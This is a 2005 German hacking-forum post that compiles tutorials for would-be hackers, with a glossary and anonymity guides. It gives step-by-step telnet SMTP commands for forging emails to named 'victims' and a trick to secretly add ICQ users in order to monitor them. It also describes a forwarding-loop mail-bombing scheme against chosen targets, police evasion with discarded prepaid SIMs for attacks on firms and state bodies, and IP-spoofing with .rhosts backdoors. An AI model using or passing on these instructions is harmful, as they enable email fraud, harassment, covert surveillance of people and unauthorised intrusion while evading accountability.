PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Über 80 Seiten TUTS



PCKING
19.07.2005, 17:46
Hi Kollegas! ICh habe mir mal erlaubt viele tuts zusammenzufassen und sie euch hier anzubieten. Die Tuts stammen nicht von mir, will ich ausdrücklich betonen. Wünsche euch dennoch viel Spaß und good Hack! Ihr handelt wie immer auf eigene Gefahr hin! :evil:

Wie werde ich ein Hacker?

Inhaltverzeichnis

Anonymität:

Erläuterung von Begriffen Seite 3
Wie faket man Emails mit Telnet? Seite 5
Wie faket man Emails bei T-Online oder AOL? Seite 6
Anonym surfen Seite 6
ICQ User adden, ohne deren wissen Seite 8
Mails unter Linux faken Seite 8
Email Bomben Seite 9
100%ige Anonymität Seite 10
SPOOFING-ATTACKEN/IP-SPOOFING Seite 11
Ändern des Hostnamens Seite 12
Proxy-Server Seite 12


Hacking:

Was ist FTP überhaupt? Seite 14
Hacking Webpages Seite 16
Private Webseite hacken Seite 19
Vom Menschen zum Unix-Hacker Seite 19
Was ist überhaupt ein Hacker? Seite 42
Testen der Sicherheit der eigenen Website Seite 48
Wie man an einen T-Online Account kommt Seite 51
Wie man ne egroups.com Mailinglist hackt Seite 52
Lokalen AdminRechte an einem Win-NT4 Rechner holt Seite 53
Hacken einer FTP-Site Seite 54
Tripod Accounts hacken Seite 57
BIOS-Paßword umgehen Seite 59
HT-Access hacken Seite 61
Beschreibung was Exploitz sind und wie man sie anwendet Seite 63
DoS-Attacken Seite 64
WWWBoard hacken Seite 66
Javascript Passwort Schutz System Seite 66
GMX-Account hacken Seite 68
Hacken eines localen Rechners Seute 69


Trojaner:

Die Benutzung der Winsock in ihrer Applikation Seite 71
Trojaner Seite 73
ICQ als Trojaner Seite 74
Das Paßwort eines Netbusservers zu bekommen Seite 75
SubSeven Seite 76
BackOrifice Seite 78
Rundll32 Befehle bei Viren Seite 79
Trojaner für totale Anfänger Seite 80
Sourcecode des I love you Virus Seite 81
Wie man seine Viren Anti-Bait-fähig macht Seite 86


Phreaking:

Genaue Beschreibung wie man Telephonleitungen anzapft Seite 87
Verschiedene Möglichkeiten des kostenlosen Telefonierens Seite 89
IP:

Wie man von Leuten die IP Nummer rausbekommt Seite 89
Provider einer Person anhand seiner IP herausbekommen Seite 90
Wie bekomme ich eine IP heraus ? Seite 91


Linux/Unix:

Betriebssystem Linux Seite 92
Einführung in die grundlegende Systemsicherheit unter Linux Seite 93
Wie man Mails unter Linux faked Seite 95
Was sind und wie benutzt man Exploitz Seite 95
Linux installieren Seite 97
Wie Unix entstand Seite 99


Sonstiges:

Bedeutung verschiedener Ports Seite 99
MailServers Seite 100
Mailbombing Seite 101
FTP-Befehle Seite 102
Diskettenbombe basteln Seite 103
DOS Befehle Seite 103
Sicherheitslücken von WinNT Seite 104
Windows Sicherheitslücken Seite 105
Wie man eine Page gut mit einem Paßwort sichert Seite 107
Was man alles aus den Header einer Email lesen kann Seite 109
Was ist überhaupt ein Port Seite 112
Gästebücher mit html Unterstützung unbrauchbar machen Seite 113
Ohne Trojaner mit anderen Computern verbinden Seite 114
Sniffer und deren Gefährlichkeit Seite 115
Telnet Seite 115
Diverse GSM Codes Seite 116
E-Mail Bomber als ICQ Bomber Seite 119
Sicherheit-, Sicherheitslöcher von ICQ Seite 120















Bemerkung:
Ich habe alles selber nur von anderen Tuts gesaugt und werde hier keine Namen eintragen. Ich möchte ja niemanden beleidigen aber als Hacker sollten die Tuts-Schreiber verständnis haben. Deshalb werde ich mich nur als Anonymus bezeichnen.

Cu Anonymus
Wirklich sicher und anonym ist man eigentlich nie...es gibt fast immer einen Weg (manche davon sind natürlich SEHR aufwendig) jemanden zurückzuverfolgen oder Informationen über jemanden herauszufinden. Man kann aber mit einigen simplen Einstellungen seinen PC RELATIV sicher machen.
1. Geht in die Einstellungen eures Browsers und stellt AktiveX auf
Eingabeaufforderung und Cooky´s komplett aus! (was beide bewirken lest
ihr im Lexikon)
2. Ladet euch eine gute Firewall runter (ATGuard ist zu empfehlen; gibt es
in der Tools-Section bei uns)
3. Öffne NIE eine Datei die du von einem Fremden bekommst!
4. Gib NIE deine richtigen Daten bei Downloads/Setups usw. an! Also wenn
nach deiner Adresse gefragt wird, gib irgendwas an!
5. Nimm für deine Mailaddresse usw. immer Passwörter wie "Kre-7104-hn4" und
nie so was wie "Hund" oder "Katze" oder so etwas in die Richtung...warum
ihr das machen sollt könnt ihr in den Tuts und in den Anleitungen der
Programme nachlesen.
6. Wer noch ein Stück mehr Sicherheit haben will (wenn es wirklich mal ans
Hacken geht) sollte eine Proxysurfer benutzen. Wie das funktioniert
steht in der Tuts-Section (oder natürlich wie immer einfach auf das Wort
klicken...sorry, ich weis das Newie nicht mit dumm gleichzusetzen ist)
7. Darüber hinaus gibt es noch gewisse Regeln die Hacker oder solche die es
werden wollten unbedingt beachten sollten (sogenannte Hackerethik).


Anonymizer:
Der Anonymizer filtert Informationen beim besuchen einer Website heraus, mit denen man eventuell zurückverfolgt werden kann.

Appz (Appps):
Appz bedeutet soviel wie Standardapplikation. Diese Bezeichnung wird oft auf Warez-Pages benutzt.

Attachment:
Darunter versteht man den Anhang (Bilder, Progs, Trojans...) der mit einer E-Mail verschickt wird.

Authentifizierung:
Während der Authentifizierung wird die Identität des Benutzers oder des Servers sichergestellt (z.B. Anmeldung bei GMX).

Backdoors:
Backdoors sind sogenannte Hintertüren, die Programmierer meist zum Austesten eines Programms eingebaut haben, um z.B. nicht jedes mal sämtliche Passwörter eingeben zu müssen.

BFH:
Brute Force Hacking ist nichts anderes als Passwortraten. Man bekommt auf diese Weise aber nur selten Root-Zugriff auf den Server den man hacken will.

Cookys:
Cookys sind kleine Dateien die eine Homepage auf deiner Festplatte hinterlässt um dich beim nächsten besuch der HP sofort zu Identifizieren und gleich deinen Namen und Passwort in die entsprechenden Felder einträgt. (z.B. Bei deinem E-Mail dienst).

Cracker:
Cracker erstellen meist Patches, die Testlimitzeit oder den Passwortschutz
außer kraft setzen. Man bezeichnet aber auch jemanden der sinnlos fremde
Systeme zerstört als Cracker.

Denial-of-Service Attacke:
Ein solcher Angriff blockiert einen fremden Computer oder bringt ihn zum
Absturz.

Elite:
Sind Hacker die sich auf ihren Gebiet besonders gut auskennen.

Faken:
Faken bedeutet fälschen oder verändern. Wenn dir z.B. erzählt das T-Online der Hacker-Provider Nummer eins ist, dann ist das auch ein Fake.

Firewall:
Ein Firewall-Rechner wird zwischen Server und Online-Zugang installiert und
überwacht jeglichen Datenverkehr, der zu bzw. von dem Server geschickt wird. Mit solchen Systemen ist es möglich bestimmte Internetadressen zu sperren, bzw. den Zugriff auf dem Server nur bestimmten Leuten zu ermöglichen.

Hacker:
Das Ziel eines Hackers ist es sich ständig zu verbessern und immer neue
Sicherheitslücken von Programmen und Internetdiensten zu erkunden. Er zerstört nur Daten wenn diese ihm gefährlich werden könnten.

Lamer:
Lamer sind Idioten die sich als Hacker ausgeben.

Phreaking:
Darunter versteht man kostenlos oder auf kosten anderer zu telefonieren oder zu Surfen.

Port-Scanner:
Ein Port-Scanner scannt nach offenen Ports im Internet oder im Netzwerk. Es
gibt auch welche, die nach Computern suchen, die mit einem Trojaner infiziert worden.

Remailer:
Mit Hilfe eines Remailers kannst du anonyme Mails verschicken, die auch keine Provider-Kennung mehr enthalten. Bevor du ein solches Programm benutzt, empfehle ich dir es vorher an dir selbst zu testen, denn nur wenige dieser Programme funktionieren auch richtig.

Root-account:
Bei einem Root-account hat man volle Systemprivilegien. Man kann alle Daten lesen, schreiben und auch löschen. Alle anderen Accounts haben nur beschränkten Zugriff auf den Server.

Sniffer:
Sniffer hören den gesamten Datenverkehr der übers Modem oder über die Netzwerkkarte läuft ab. Mit solchen Programmen kann man sehr gut Passwörter abhören.

SSL:
SSL ist ein Protokoll das alle Daten verschlüsselt und daher relativ sicher ist.

Sub 7:
Sehr guter Trojaner. Leicht zu bedienen und seht komfortabel. Mit ihm kann man leicht auf andere Rechner zugreifen nachdem man dort eine Datei rein geschmuggelt hat.

Tracen:
Tacen bedeutet zurückverfolgen. Zum Beispiel "Lock in Trace", dass Fangschaltungssystem des FBI.

Warez:
Unter Warez versteht man Software die gratis zum download angeboten wird.


Es ist für die Betreiber einer Seite sehr leicht an deine Daten zu kommen. Achte darauf das du keinen Mist machst solange sie deine IP haben! Lies dir das zu Anonymität/Proxys durch.



Anonymität


Wie faket man eMails mit Telnet?:

Also hier mal ein ganz einfaches Beispiel was zu diesem Zeitpunkt am
07.11.1999 funktioniert hat. Als erstes mal startet man Telnet von Windows. als erstes mal start - ausführen drücken. (erinnert mich irgendwie an Computerbild :-) ).
Dann einfach im Feld „telnet UTMJB.UTM.MY 25“ eingeben.
Nun öffnet sich ein Fenster und da steht denn ein bisschen was. das ist aber völlig uninteressant. Nun gibst du „helo gmx.de“ (anstatt gmx.de geht auch t-online.de oder jede x beliebige)ein.
Nach der Eingabe immer Enter drücken!
danach sagt er „UTMJB.UTM.MY is my domain name.“ (das variiert zwischen den Servern).
Jetzt geben wir an von wem die Mail sein soll.
Du gibst jetzt ein „mail from:<name@t-online.de>“ (auch hier wieder alles selbst auswählbar).
Jetzt sagt er OK.
Jetzt gibst du ein für wen die Mail bestimmt ist
„rcpt to:<opfer@adresse.de“.
Jetzt kommt erneut die Meldung OK.
So als nächstes das was in der Mail stehen soll du gibst ein „data“.
Darauf erscheint die Meldung
„enter mail body. end by new line with just a .”
das Heißt du gibst jetzt ganz normal deinen text ein und wenn du fertig bist drückst du Enter, gibst einen „.“ ein und denn nochmals Enter. Nun bekommen wir die Meldung: „mail delivered“ (= Mail gesendet)
tja das war es. bei den hier genannten Server hat es bei mir jedenfalls geklappt. Bei anderen weiß ich nicht. eine liste mit Servern (by killah.priest) findet ihr auf
meiner Page.

ACHTUNG!!!
Solltet ihr einen t-onliner oder so mailen, dann steht in der Absenderleiste nichts. das Heißt es gibt dann keinen. wie man dieses Problem umgehen kann erfahrt ihr in meiner anderen text-file unter http://Nova-Beast.de.st .
Tipp: Schick nie einem Hacker eine gefakte Mail! wenn er denn mal bock hat rächt er sich vielleicht.






Wie faket man eMails bei T-Online oder AOL?:

nehmen wir mal an, du möchtest jemanden eine gefakte Mail schicken, der jedoch bei T-Online oder AOL ist. (bei GMX und so funktionierts ja)
z.B lautet die Adresse opfer@t-online.de . nun hast du ihn (vielleicht einen kumpel) über Telnet eine gefakte Mail geschickt. doch in seiner Absenderleiste steht kein Absender drin. Tja schade wo du ihn doch mal so richtig verarschen wolltest und die Adresse deines Lehrers dort stehen sollte. Na gut hier die Lösung:
Ihr holt euch einfach bei GMX (www.gmx.de) oder Topmail (www.topmail.de)
eine kostenlose Email Adresse. Hhmmmm schon mitgedacht???
also weiter: in den Menüs kann man festlegen, das die ankommenden Mails an eine bestimmte Adresse weitergeleitet werden sollen. Du gibst einfach die Adresse deines Opfers an und schickst die gefakte Mail über Telnet an die Adresse von GMX oder Topmail. der von t-online bekommt nun die weitergeleitete Mail und hat somit den gefakten Absender zu stehen. Noch einmal in der Kurzfassung: -kostenlose Email bei GMX oder Topmail besorgen -in den Menüs auf weiterleiten an: die Adresse deines Opfers angeben –über Telnet die gefakte Mail an dein Opfer über GMX senden das ist doch gar nicht so schwer oder?
ACHTUNG!!!
Wenn euer Opfer etwas Ahnung hat, dann guckt er in den Header der Mail und kann dort die GMX Adresse sehen von der die Mail weitergeleitet wurde. Also Vorsicht!


Anonym surfen:

Also dieser text wird euch beschreiben wie man anonymer im Internet surfen kann. Auf manchen Seiten wird man regelrecht ausspioniert. um das zu verhindern bzw. denen das etwas schwerer zu machen gibt es mehrere Möglichkeiten. Diese Beschreibung bezieht sich auf den Netscape Communicator 4.x, da wir ja niemals auf die Idee kämen den Internet Explorer zu benutzen :-)

Als erstes sollte man die Cookies, Java u. Javascript deaktivieren
Bearbeiten -> Einstellungen... | Erweitert :Cookies, Java u. Javascript deaktivieren.

man ist aber noch lange nicht sicher!
Als nächstes besorgt man sich Junkbuster von irgendeiner Page.
vielleicht hab ich es während du das liest das schon auf meiner Page www.Nova-Beast.de.st wenn nicht dann schau mal auf der Junkbuster Page vorbei (www.internet.junkbuster.com) so nehmen wir an du hast das Programm jetzt entpackt.

Jetzt muss man ein paar Einstellungen beim Communicator ändern.
Bearbeiten | Einstellungen... | Erweitert | Proxies
da auf "Manuelle Proxy-Konfiguration klicken
dann auf den Button daneben ("Anzeigen")
neben "http" und "Sicherheit" gibst du dann "Localhost" ein (ohne "")
beim Port jeweils "8000" eingeben (auch ohne "")

bevor du dich einwählst bzw. den Netscape startest musst du junkbstr.exe starten! So das war es eigentlich auch schon! mehr nicht! jetzt seit ihr zumindest etwas sicherer im Netz. um herauszufinden ob das nun auch funktioniert gehst du auf diese Page: http://www.anonymizer.com/snoop.cgi
das erste mal ohne diese Einstellungen und das zweite mal mit den Einstellungen und Junkbuster. Dir müsste jetzt was aufgefallen sein...



Wenn man sich ins Internet einwählt erhält jeder Surfer eine IP Adresse.
diese kann etwa so aussehen: 123.521.23.12
Seine eigene IP Nummer kann man wie folgt herausfinden: START-AUSFÜHREN-"WINIPCFG" eingeben (ohne"").

Es gibt verschiedene Möglichkeiten IP Nummern herauszufinden. zum Beispiel über eine Email. Mann schaut einfach in den Header. wenn du jetzt z.B. den Netscape Messanger verwendest kannst du den Header wie folgt ansehen:
ANSICHT-KOPFZEILEN-ALLE
Das müsste etwa so aussehen:
Received: (from smtpuser@localhost) by econophone.ch (8.9.1b+Sun/8.9.1) id SAA17454 for <benny@econophone.de>; Sat, 29 Jan 2000 18:25:30 +0100 (MET)
Received: from mailout02.sul.t-online.de(194.25.134.17) via SMTP by econophone.ch, id smtpdAAAqYaWeI; Sat Jan 29 17:25:26 2000
Received: from fwd00.sul.t-online.de by mailout02.sul.t-online.de with smtp id 12Ebcj-0001tL-07; Sat, 29 Jan 2000 18:25:25 +0100
Received: from (32006289364-0002@[62.158.87.130]) by fwd00.sul.t-online.de with smtp id 12Ebcj-1fdmroC; Sat, 29 Jan 2000 18:25:25 +0100
Von: Faust.Full@t-online.de (ClG)
An: benny@econophone.de
Betreff: scheiß
X-Mailer: T-Online eMail 2.3
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8BIT
Datum: Sat, 29 Jan 2000 18:25:25 +0100
Nachrichten-ID: <12Ebcj-1fdmroC@fwd00.sul.t-online.de>
X-Sender: 32006289364-0002@t-dialin.net
X-Mozilla-Status: 8003
X-Mozilla-Status2: 00000000
X-UIDL: 646d822d2c9f5de91571bebec9c699d2

So hier können wir erkennen, das der Mailer Faust.Full@t-online.de ist.
Seine T-Online Nummer wäre: 32006289364-0002.
Außerdem sehen wir das der Mailer das Mailprogramm von T-Online benutzt.
(Mozilla=Netscape Messenger - Microsoft Outlook Express=Microsoft Outlook Express). Bei älteren T-Online Kunden ist die t-online-nummer auch gleichzeitig die Telefonnummer.
So und die IP Nummer wäre jetzt also 62.158.87.130
Diese ist aber schon bei der nächsten Einwahl anders. meistens ändern sich allerdings nur die letzten beiden zahlen, so das wenn er mit einem Trojaner infiziert ist man nur noch die ältere IP eingeben brauch und dann sbscannen. Oft hat man schnell sein Opfer "wiedergefunden". Tja also wie kann man seine IP Nummer verstecken? Nehmen wir an du möchtest also jemanden ne anonyme Mail schicken und der soll aber die IP Nummer nicht lesen können. aber du möchtest eine antwort.
Die Lösung ist ein: anonymer Remailer ein guter ist mixer@nowhere.to
diese Email Addy geben wir also als Empfänger ein. Den betreff kannst du dir aussuchen und dann aber müssen die ersten Zeilen der Email folgendes enthalten:

::
Request-Remailing-To:Opfer@talknet.de
--- leerzeile ---
hier dann den normalen text schreiben...





Der Empfänger kann dir sogar zurückschreiben, kann jedoch nicht feststellen wer du bist oder woher du kommst denn alle unwesentlichen Daten wurden gelöscht. Nachteil: es dauert ein paar Minuten bis die Mail ihr ziel erreicht hat.

so wenn du deine IP auch während des Surfens oder Chatten verstecken möchtest dann gibt es IP-Spoofer dafür. Runterladen kannst du dir welche unter http://www.Nova-Beast.de.st falls die nicht funzt nimm diese http://besu.ch/nova-beast eine andere Möglichkeit ist das surfen über Proxy-Server. Man braucht aber nicht unbedingt das Programm Junkbuster dafür. einfach (ich gehe wieder vom Netscape Communicator aus) auf BEARBEITEN-EINSTELLUNGEN-ERWEITERT-PROXIES-AUTOMATISCHE PROXY KONFIGURATION. Da gibst du denn im Feld die Adresse eines Proxy Servers an.
z.B. blue.pompano.de:8080 oder s2.optonline.net:8080 oder aber cache01.pathcom.com:8080 so nun solltest du wieder etwas schlauer sein was die Anonymität im web angeht.


ICQ User adden, ohne deren wissen:

Hier geht es um das berühmte Chat Programm : ICQ !!!
Ihr habt euch sicherlich schon gefragt wie man über ICQ User Added, ohne dessen Erlaubnis. Im großen WWW exisitieren einige Crackz, die (fast) alle funktionieren und ihren Dienst tun. Leider haben sie doch alle ein Problem:
Nehmen wir mal an, ihr Patcht euer ICQ mit einem dieser Crackz und added jemanden zu eurer Kontakt Liste. Ja, und wo bleibt der Haken werdet ihr euch jetzt sicher fragen. Der Haken ist ganz einfach: Denjenigen, den ihr geadded habt, teilt ihr (ob ihr wollt oder nicht) eine kurze System-Message mit, die besagt, das ihr ihn zu eurer Liste hinzugefügt habe. Na, ihr wisst jetzt schon was an der Sache scheiße ist ??? Okay, um dem Abhilfe zu schaffen, das er nicht mitbekommt, das ihr ihn geadded habt, habe ich hier dieses Tutorial geschaffen :-) Die Lösung des Problems ist ganz einfach:
Downloaded euch zuerst einen dieser Crackz, deaktiviert ICQ, patcht ICQ und versucht einen User zu adden ohne ihn um Erlaubnis zu fragen. Sollte dies erfolgreich geschehen, geht es nun hier weiter. Sucht nach der UIN über ICQ die Person, die ihr hinzufügen wollt. Sobald ICQ eure Anfrage positiv bestätigt, markiert den Namen der Person, indem ihr einfach auf den Namen klickt. Und nun HALT !!! Klickt auf keinen Fall weiter oder so einen Schrott. Nun trennt ihr eure Verbindung zum Internet. Sollte dies erfolgreich geschehen sein, klickt nun auf "Next". Die daraus enstandene Folge ist simpel. ICQ bombt euch nun mit Fehlermeldungen zu, die besagen, das keine Nachricht gesendet werden konnte und so einen Müll. Aber daran werden wir uns jetzt nicht stören. Nach dem Bestätigen der Fehlermeldungen können wir erfolgreich unser Ergebnis der Aktion sehen... Wir haben die gewünschte Person auf unserer Contact-List, und zwar, ohne das die etwas davon mitbekommt. Um sicher zu gehen, startet den Rechner erneut, verbindet euch dann wieder mit dem Internet. Nun könnt ihr in vollen Zügen beobachten, wann die Person online ist, ohne das sie etwas davon merkt. Nett, oder ???












Mails unter Linux faken:

Die Fakemails funken 100% und absolut Anonym unter Linux!
Man muss als erstes ins Terminal gehn und dann gibt man ein:

telnet
open localhost 25
mail from:xxx (hier gibt man irgend ein Pseudonym an)
rcpt to:xxx (hier kommt die Email Addi des Opfers hin)
data

Und jetzt gibt man den Text ein, zum Fertigstellen macht man einen "."!
Danach nur noch "Quit" eingeben und fertig!
Diese Mail sollte eigentlich schon sehr anonym sein, es wird als Host nur localhost und so angezeigt!


Email Bomben:

Heute führe ich Euch in eine neue Dimension des SMPT-Floodens (mailbombing) ein. Ich habe sie entwickelt, da ich es blöd fand beim Mailbomben die ganze Zeit online zu sein. An sich ist die Methode relativ einfach, deshalb wundert's mich auch das sie noch niemand entdeckt und publiziert hat (war mir zumindest nicht bekannt). Jedenfalls find ich es cool, das ich durch diese neue Technik dazu beitragen kann, die Hack-Kultur zu stärken :-) Sie wurde von mir auf den Namen "Magic Mail System" [MMS] getauft.

Ihr dürft sie natürlich alle verwenden (und etwas abwandeln), wenn Ihr das Copyright (das ich sie entwickelt hab ...) mit übernehmt. (!) Wenn Ihr das Copyright nicht mit übernehmt oder verändert, dann legt Ihr euch mit den Virtual Net Hackerz an (!)

Meldet euch bei 2 verschiedenen Webpostfach-Anbietern mit der Möglichkeit der Email Weiterleitung gefaked an. Es wäre nicht schlecht, wenn eines dieser Postfächer einen Auto-Re-Sponder hätte...(besser gesagt, eins davon muss einen Auto-Re-Sponder haben ! (Web.de ist nicht so gut, da man dort einen Aktivator-Key muß, der per Post gesendet wird - ihr also eure echten Daten angeben müsstet)

Jetzt, nach dem ihr euch da angemeldet habt müsst ihr bei Postfach eins eine permanente Weiterleitung zu Postfach 2 herstellen. Bei Postfach 2 stellt ihr eine permanente Weiterleitung zu Postfach 1 her. Dadurch entsteht ein Mail-Loop (Mailschleife). Das ist ja nun ganz schön und gut, aber was nun ? Bei dem einen Postfach mit Auto-Re-Sponder Funktion aktiviert Ihr die halt und gebt einen Text (!) mit meinem Copyright und Namen der Methode (!) ein.

Da es eine Mailschlaufe ist wird diese Mail immer und immer wieder (bis der Account gesperrt wird) bei dem Ostfächern eintreffen. Also auch beim mit Auto-Re-Sponder. Wenn jemand z.B. per Outlook & Co eine Mail an eines der beiden Postfächer sendet, dann wird er durch die ganzen Auto-Re-Sponders zugebombt *g*

Wie kann man das jetzt aber nutzen um jemanden zu zubomben ?
Na ganz einfach : Man spooft eine Email via Telnet und gibt als angeblichen Absender die Adresse der Person, die zugebombt werden soll ein. Das ganze kann man mit mehreren Personen machen, falls man das Spoofen mit Telnet nicht beherrscht kann man ja auch einen Anonymous-Mailer nehmen. (!) Achtung : Man sollte sich über IBC (Internet by Call) oder nen Fake einwählen, da durchdas SMTProtokoll ja deine IP (Internet Protocoll) Adresse mitgesendet wird.

Worin liegen die Vorteile gegenüber des 'normalen' SMTP-Floodens ?
1. Beim "Magic Mail System" muß man nicht die ganze Zeit online sein
während man bombt (spart Zeit+Geld).
2. Man kann mehrere Personen zugleich bomben. (bei vielen Mailbombern
nicht möglich,selbst wenn möglich wäre die Geschwindigkeit viel
niedriger)
3. Es geht oft schneller als die herkömmliche Methode.
4. Dadurch das es bombt bis ein Account gesperrt ist kommen bei dem/n
Empfänger/n viel, viel mehr Mails an, asl wenn man z.B. einmal jemanden
3 Stunden zubombt.

Wenn es mal nicht funtzt(was wahrscheinlich ist), dann schaltet einfach noch 2 Server/Accounts zwischen, dann klappt es so gut wie immer!!!


100%ige Anonymität:

-Vorwort-
Dieses Tutor enthält nicht die üblichen, wenig nützenden Tipps, wie Junkbuster etc. benutzen. Es geht hierbei um 100%ige Anonymität!
Jetzt werden wahrscheinlich viele Leute "Das ist doch unmöglich: Nach Einstein ist ALLES RELATIV!" schreiben. Doch wenn man etwas Hirn hat sind die 100% leicht zu ereichen! Die heutige Polizei- und "schnüffel/trace-" Techniken sind Lückenhaft. Man muß es also "nur" schaffen sich in den Lücken zu bewegen!


-Anonymität-
Jo, du brauchst:
- 1ne Prepaid Karte (empfehe EplusFree'n'Easy - weil relativ billig)
- 1 - 3 Aufladekarten (bei Eplus Free'n'Easy heissen die Free & Easy Cash)
- 1 Handy, mit einem PC(Modem)-Adapter
- 1 Laptop mit Modem
- Software, für deinen Zweck

Ihr solltet das Handy/den Adapter/die PrePaid Card in einem entfernteren Laden kaufen. Er sollte mindestens 5 km von eurem Wohnort entfernt sein.
Nun erst mal das Handy mit der/den PrePaid-Card(s) aufladen, damit du genug Money drauf hast.

Ich erkläre euch zunächst wieso es unbedingt ein Handy mit PrePaid Karte sein muss: Wenn man sich eine PrePaid Karte holt, braucht man seine Daten nicht angeben! Also können die Bullen nur (wenn sie das überhaupt machen) deine Rufnummer und deinen ungenauen Standort durch's Tracen ermitteln.
Dieser "StandortTrace" ist auf einem Umkreis von 500-1000 m genau.

So, du fährst mit Bus/Bahn etc in eine große Stadt, sofern Du in keiner lebst. Sie sollte über 1 mio. Einwohner haben, da dort mehrere Leute mit Handy telefonieren und vor allem sehr viele Leute in dem Umkreis "leben/arbeiten/etc". Dadurch können die Bullen dich sogut wie nicht ausfindig machen. (Falls Sie das überhaupt tuen werden während du dort bist-sehr unwahrscheinlich [das Tracen war gemeint] ) Falls Du in einer solchen Großstadt lebst, solltest du mindestens 1,5 km von deiner Wohnung
aus weggefahren sein um dich sicher zu fühlen!

Nun wählst du dich über einen IBC Prvider ein !
(nur ein Blödmann würde über seinen Vertrags-ISP reingehen)
(Anmerkung: IBC=Internet by Call [z.B. Mogelcom] - ISP=Internet Service Provider [z.B. T-Online] ) Wieso IBC? Bei IBC unterschreibt man keinen Vertrag etc., es wird alles mit der Telefonrechnung bezahlt.
Die Rechnung erhält man per Post, da du aber über ein prePaid Handy reingehst-haben sie die Adresse nicht Es ist nicht so, das du nix bezahlen müsstest , die werden meist über dein PrePaid... abgerechnet.
Fazit: Niemand kennt deine Daten und du kannst machen was du willst.
Es lohnt sich aber nicht zum "normalen Surfen", sondern nur für besonders illegale Hackz! (besonders illegale Hackz sind z.B. Firmen, Staatsorgane etc. angreifen
- Xoom FTP Hacking gehört nicht grad dazu)
-Schlusswort-
Ein weiteres Tut von mir ist scheinbar am Ende, aber einen Tipp habe ich noch für euch: Die Bullen werden wahrscheinlich die LOG-Filez der Server, die ihr genutzt habt angucken und eure IP herausfinden. Dann geben Sie die IP und Uhrzeit dem Provider, der ihnen helfen soll. Ein ISP würde ihnen deine Adresse etc. geben. Ein IBC Provider hat nur die Telenummer (Handynummer in diesem Fall). Da es ein PrePaid-Card Handy ist hat auch nicht der Netzbetreiber Info's über dich. Nun werden die Bullen versuchen dein Handy abzuhören... Also, wirfst du einfach die PrePaid-Sim-card weg und bist 100%ig Anonym im Netz gewesen. Beim nächsten Hack, einfach ne neue PrePaid Card (die weist die Handy-Nummer zu) kaufen und den Text noch mal durchlesen ;-)


SPOOFING-ATTACKEN/IP-SPOOFING:

Spoofing bedeutet, dass man einem System eine falsche IP vortäuscht um so in das System und zu kommen. Auf diese Weise kann man auch sichere Firewalls durchdringen. Allerdings braucht man ein bestimmtes wissen um so eine Attacke durchzuführen, z.B. über TCP/IP:

-IP-: IP leitet die Datenpakete von dem einen System zum anderen und ist nur für den Pakettransport zuständig. IP nimmt keine Überprüfungen an den Daten vor - sie könnten also beschädigt sein.

-TCP-: TCP dagegen überprüft, bestätigt und verarbeitet die Pakete. Es wird dem Sender mitgeteilt ob alles korrekt und vollständig angekommen ist. Werden z.B. 10 Datenpakete verschickt kommen sie dann auch in dieser Reihenfolge beim Empfänger an. Außerdem bekommt jedes Paket noch seine eigene Nummer, die vom Sender und vom Empfänger zur Berichterstattung und zur Fehlermeldung verwendet wird.

Wenn man jetzt in ein System will muss man ihm nicht nur eine bestimmte IP vortäuschen, sondern auch korrekt mit ihm 'kommunizieren'. Das Zielsystem legt eine Anfangssequenznummer fest und der Angreifer muss darauf richtig antworten. Das macht die Sacher dann ganz schön kompliziert.

Um nun eine Spoofing Attacke durchzuführen muss man wissen zwischen welchen Systemen ein 'Vertrauensbeziehung' besteht. Vertrauensbeziehung bedeutet, dass die zwei Rechner autorisiert sind sich zu verbinden. Vertrauen sich zwei Systeme, wird die Richtigkeit von Verbindungen nicht streng überprüft. Man kann sich z.B. mit 'rlogin' mit einem anderen Rechner verbinden. Dabei wird nämlich kein Passwort abgefragt, sondern man hat sofort zugriff. Das ist so wie eine Telnetverbindung ohne Passwortabfrage, weil sich die beiden Rechner ja vertrauen.

Dann muss man folgende Schritte durchführen:
Man muss das System ausschalten für das man sich ausgibt
Dann muss man die Adresse des systems vortäuschen
anschließend verbindet man sich mit dem System, wobei man sich als das lahmgelegte system ausgibt
zuletzt muss man 'nur noch' die richtige Sequenznummer erraten die das Ziel verlangt, wobei das wohl der schwierigste teil ist

Doch auch dieses Problem kann man lösen in dem man das Zielsystem mit der falschen IP-Adresse kontaktiert und eine Verbindung anfordert. Das Ziel sendet nun ein Reihe von Sequenznummern an das andere System. Man muss sich die Sequenznummern am besten aufschreiben, danach kann man die Verbindung trennen. Aus diese Sequenznummern muss man nun einen Algorithmus herausfinden, der zur Authentifizierung dient. Hat man das geschafft kann man eine Spoofing Attacke durchführen. Hat man sich eingeloggt ist es am besten die Datei. Rhosts, die auch für 'rlogin' zuständig ist zu ändern, so dass man später ganz einfach in das Zielsystem reinkommt. Es gibt ahlreiche Spoofing Software die für Linux und Unix geschrieben wurde, man muss sie nur finden!
Ändern des Hostnamens:

Fangen wir doch mal für die nicht so fortgeschrittenen User an: Ich will ins Netz, wie funktioniert das?
-Ich wähle mich ein <decoder, oder dfü>. Ich wähle also eine Telefonnummer,
das ist dann also die Nummer für den Host deines Providers, der dich ins Netz befördert und dann geht's zum Backbone...

Wenn ich nun aber irgendwelche "verbotenen" Sachen treibe, ist es meist sehr hilfreich, so anonym wie möglich zu sein. ;) Seine IP bekommt man (wenn sie dynamisch ist) in der Regel bei jedem Login ins Netz vom Provider-Host, es ist also jedes mal eine andere. Diese kann man ja
problemlos ändern (für die Lamer unter euch, versucht mal einen anonymer Dienst).

Jetzt zum Host-Renaming: man wählt sich mit Telnet in einen Host ein, der die dev. op. mode unterstützt (hehe, es wird beim Logon angezeigt, ob der Host diesen Dienst unterstützt). Nun einfach mal diese Option wählen. Dies funzt meistens über .i . Jetzt ändert ihr eure Hostadresse. Also einfach als User einwählen! Jetzt bekommt ihr eine völlig neue Identität! Man sollte sich im übrigen als Anoymous einloggen ;), sonst ist deine Adresse ja wieder bekannt. Allerdings muss man Telnet gestartet lassen und beim Host eingeloggt bleiben, solange man im Netz anonym bleiben will. Für alle Oberlamer: es beschweren sich alle, denen ich das hier erklärt habe, dass sie nach ein paar Minuten wieder raußgeschmissen werden, man sollte daher so klug sein und ein bißchen pingen. :) Und nun habt ihr eine neue Identität!!! Eure Up- Downstreamrate wird nicht leiden. ;)


Proxy-Server:

Einführung Übersetzungen der wichtigen Wörter:
proxy ---> = vollmacht, bzw. bevollmächtigung
server ---> = dienstprogramm, bzw. diener
anonymous ---> = anonym
isp ---> (internet service provider) = internetanbieter
ip ---> = internet protokoll

